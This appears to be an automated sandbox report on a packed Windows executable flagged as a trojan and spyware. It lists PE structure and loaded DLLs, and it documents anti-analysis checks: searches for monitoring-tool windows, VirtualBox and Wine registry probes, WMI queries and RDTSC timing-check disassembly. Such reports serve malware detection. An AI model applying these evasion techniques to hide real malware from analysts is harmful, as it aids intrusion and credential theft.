              Source: yO9EAqDV15.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeCode function: 0_3_017E178A0_3_017E178A
              Source: yO9EAqDV15.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: yO9EAqDV15.exeStatic PE information: Section: ZLIB complexity 0.9995212928921569
              Source: yO9EAqDV15.exeStatic PE information: Section: nhmyvknl ZLIB complexity 0.994432571935725
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: yO9EAqDV15.exe, 00000000.00000003.1981268875.0000000005F98000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1981842842.0000000005F65000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: yO9EAqDV15.exeReversingLabs: Detection: 57%
              Source: yO9EAqDV15.exeVirustotal: Detection: 50%
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile read: C:\Users\user\Desktop\yO9EAqDV15.exeJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: yO9EAqDV15.exeStatic file information: File size 1884672 > 1048576
              Source: yO9EAqDV15.exeStatic PE information: Raw size of nhmyvknl is bigger than: 0x100000 < 0x1a2200

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeUnpacked PE file: 0.2.yO9EAqDV15.exe.cb0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nhmyvknl:EW;wbokqakx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nhmyvknl:EW;wbokqakx:EW;.taggant:EW;
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: yO9EAqDV15.exeStatic PE information: real checksum: 0x1ce582 should be: 0x1cd2ac
              Source: yO9EAqDV15.exeStatic PE information: section name:
              Source: yO9EAqDV15.exeStatic PE information: section name: .idata
              Source: yO9EAqDV15.exeStatic PE information: section name:
              Source: yO9EAqDV15.exeStatic PE information: section name: nhmyvknl
              Source: yO9EAqDV15.exeStatic PE information: section name: wbokqakx
              Source: yO9EAqDV15.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeCode function: 0_3_05F76BAF push EB8E9FB1h; iretd 0_3_05F76BBB
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeCode function: 0_3_05F76BAF push EB8E9FB1h; iretd 0_3_05F76BBB
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeCode function: 0_3_05F76BAF push EB8E9FB1h; iretd 0_3_05F76BBB
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeCode function: 0_3_05F76BAF push EB8E9FB1h; iretd 0_3_05F76BBB
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeCode function: 0_3_05F76BAF push EB8E9FB1h; iretd 0_3_05F76BBB
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeCode function: 0_3_05F7699A push ecx; retf 0_3_05F769C0
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeCode function: 0_3_05F7699A push ecx; retf 0_3_05F769C0
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeCode function: 0_3_05F7699A push ecx; retf 0_3_05F769C0
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeCode function: 0_3_05F7699A push ecx; retf 0_3_05F769C0
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeCode function: 0_3_05F7699A push ecx; retf 0_3_05F769C0
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeCode function: 0_3_05F76BAF push EB8E9FB1h; iretd 0_3_05F76BBB
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeCode function: 0_3_05F76BAF push EB8E9FB1h; iretd 0_3_05F76BBB
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeCode function: 0_3_05F76BAF push EB8E9FB1h; iretd 0_3_05F76BBB
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeCode function: 0_3_05F76BAF push EB8E9FB1h; iretd 0_3_05F76BBB
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeCode function: 0_3_05F76BAF push EB8E9FB1h; iretd 0_3_05F76BBB
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeCode function: 0_3_05F7699A push ecx; retf 0_3_05F769C0
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeCode function: 0_3_05F7699A push ecx; retf 0_3_05F769C0
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeCode function: 0_3_05F7699A push ecx; retf 0_3_05F769C0
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeCode function: 0_3_05F7699A push ecx; retf 0_3_05F769C0
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeCode function: 0_3_05F7699A push ecx; retf 0_3_05F769C0
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeCode function: 0_3_05F76BAF push EB8E9FB1h; iretd 0_3_05F76BBB
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeCode function: 0_3_05F76BAF push EB8E9FB1h; iretd 0_3_05F76BBB
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeCode function: 0_3_05F76BAF push EB8E9FB1h; iretd 0_3_05F76BBB
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeCode function: 0_3_05F76BAF push EB8E9FB1h; iretd 0_3_05F76BBB
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeCode function: 0_3_05F76BAF push EB8E9FB1h; iretd 0_3_05F76BBB
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeCode function: 0_3_05F7699A push ecx; retf 0_3_05F769C0
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeCode function: 0_3_05F7699A push ecx; retf 0_3_05F769C0
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeCode function: 0_3_05F7699A push ecx; retf 0_3_05F769C0
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeCode function: 0_3_05F7699A push ecx; retf 0_3_05F769C0
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeCode function: 0_3_05F7699A push ecx; retf 0_3_05F769C0
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeCode function: 0_3_05F76BAF push EB8E9FB1h; iretd 0_3_05F76BBB
              Source: yO9EAqDV15.exeStatic PE information: section name: entropy: 7.984642934017876
              Source: yO9EAqDV15.exeStatic PE information: section name: nhmyvknl entropy: 7.953955254723583

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSystem information queried: FirmwareTableInformationJump to behavior
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E72566 second address: E7256D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E7256D second address: E72573 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E86ACE second address: E86ADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F7F08F64186h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E86ADA second address: E86ADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E86DB1 second address: E86DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E86DBA second address: E86DC5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jo 00007F7F08BA1E36h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E86DC5 second address: E86DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jbe 00007F7F08F64186h 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F7F08F6418Bh 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E86DE5 second address: E86DE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E86DE9 second address: E86DF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E86F48 second address: E86F4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E86F4C second address: E86F58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F7F08F64186h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E87077 second address: E8707D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E8707D second address: E87089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F7F08F64186h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E87089 second address: E870DE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push edi 0x00000014 pop edi 0x00000015 jne 00007F7F08BA1E36h 0x0000001b je 00007F7F08BA1E36h 0x00000021 popad 0x00000022 pushad 0x00000023 jmp 00007F7F08BA1E45h 0x00000028 jmp 00007F7F08BA1E46h 0x0000002d jnc 00007F7F08BA1E36h 0x00000033 popad 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E870DE second address: E870E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E870E6 second address: E870EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E8740C second address: E8741C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F7F08F6418Ch 0x0000000a jnl 00007F7F08F64186h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E8A32F second address: E8A335 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E8A335 second address: E8A339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E8A339 second address: E8A35D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov si, cx 0x0000000e push 00000000h 0x00000010 movsx edi, di 0x00000013 push EFA12690h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F7F08BA1E3Ah 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E8A35D second address: E8A367 instructions: 0x00000000 rdtsc 0x00000002 je 00007F7F08F6418Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E8A367 second address: E8A3EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 add dword ptr [esp], 105ED9F0h 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F7F08BA1E38h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 stc 0x00000028 mov cl, bh 0x0000002a push 00000003h 0x0000002c or ecx, dword ptr [ebp+122D1C5Bh] 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007F7F08BA1E38h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 00000017h 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e push 00000003h 0x00000050 mov dword ptr [ebp+122D1FD1h], esi 0x00000056 push 86DABF24h 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e jmp 00007F7F08BA1E49h 0x00000063 pushad 0x00000064 popad 0x00000065 popad 0x00000066 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E8A3EF second address: E8A41D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7F08F6418Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 392540DCh 0x00000011 mov dword ptr [ebp+122D1EECh], ebx 0x00000017 lea ebx, dword ptr [ebp+124551C9h] 0x0000001d mov esi, dword ptr [ebp+122D3669h] 0x00000023 push eax 0x00000024 pushad 0x00000025 push ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E8A41D second address: E8A426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E8A426 second address: E8A42A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E8A490 second address: E8A497 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E8A497 second address: E8A4E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F7F08F6418Dh 0x0000000d nop 0x0000000e mov esi, dword ptr [ebp+122D1A40h] 0x00000014 push 00000000h 0x00000016 jmp 00007F7F08F6418Ch 0x0000001b call 00007F7F08F64189h 0x00000020 push esi 0x00000021 pushad 0x00000022 jmp 00007F7F08F64193h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E8A4E1 second address: E8A507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F7F08BA1E49h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E8A507 second address: E8A588 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnl 00007F7F08F64186h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 jc 00007F7F08F64192h 0x00000017 jmp 00007F7F08F6418Ch 0x0000001c jmp 00007F7F08F6418Ch 0x00000021 popad 0x00000022 mov eax, dword ptr [eax] 0x00000024 push edi 0x00000025 js 00007F7F08F64188h 0x0000002b pushad 0x0000002c popad 0x0000002d pop edi 0x0000002e mov dword ptr [esp+04h], eax 0x00000032 push ebx 0x00000033 push ecx 0x00000034 pushad 0x00000035 popad 0x00000036 pop ecx 0x00000037 pop ebx 0x00000038 pop eax 0x00000039 jns 00007F7F08F6418Ch 0x0000003f push 00000003h 0x00000041 mov si, dx 0x00000044 push 00000000h 0x00000046 jp 00007F7F08F64186h 0x0000004c push 00000003h 0x0000004e jmp 00007F7F08F6418Dh 0x00000053 push 902C8587h 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007F7F08F6418Ah 0x00000060 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E8A588 second address: E8A5FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 502C8587h 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F7F08BA1E38h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 mov edi, 52F6B4F4h 0x0000002d mov edx, dword ptr [ebp+122D37ADh] 0x00000033 lea ebx, dword ptr [ebp+124551D2h] 0x00000039 jng 00007F7F08BA1E3Ch 0x0000003f and edi, 27A04ECEh 0x00000045 xchg eax, ebx 0x00000046 push ebx 0x00000047 push ebx 0x00000048 jmp 00007F7F08BA1E41h 0x0000004d pop ebx 0x0000004e pop ebx 0x0000004f push eax 0x00000050 pushad 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F7F08BA1E44h 0x00000058 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EA9568 second address: EA9575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7F08F64186h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EA9575 second address: EA957B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EA957B second address: EA9594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F08F64195h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EA9B2D second address: EA9B35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EA9F45 second address: EA9F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EAA08A second address: EAA0A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F7F08BA1E36h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d je 00007F7F08BA1E3Eh 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EAA0A1 second address: EAA0A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EAA0A5 second address: EAA0B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jnp 00007F7F08BA1E36h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EAA8B6 second address: EAA8EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7F08F6418Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F7F08F64191h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7F08F64193h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EAA8EF second address: EAA8F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EAA8F3 second address: EAA904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7F08F64186h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push edx 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
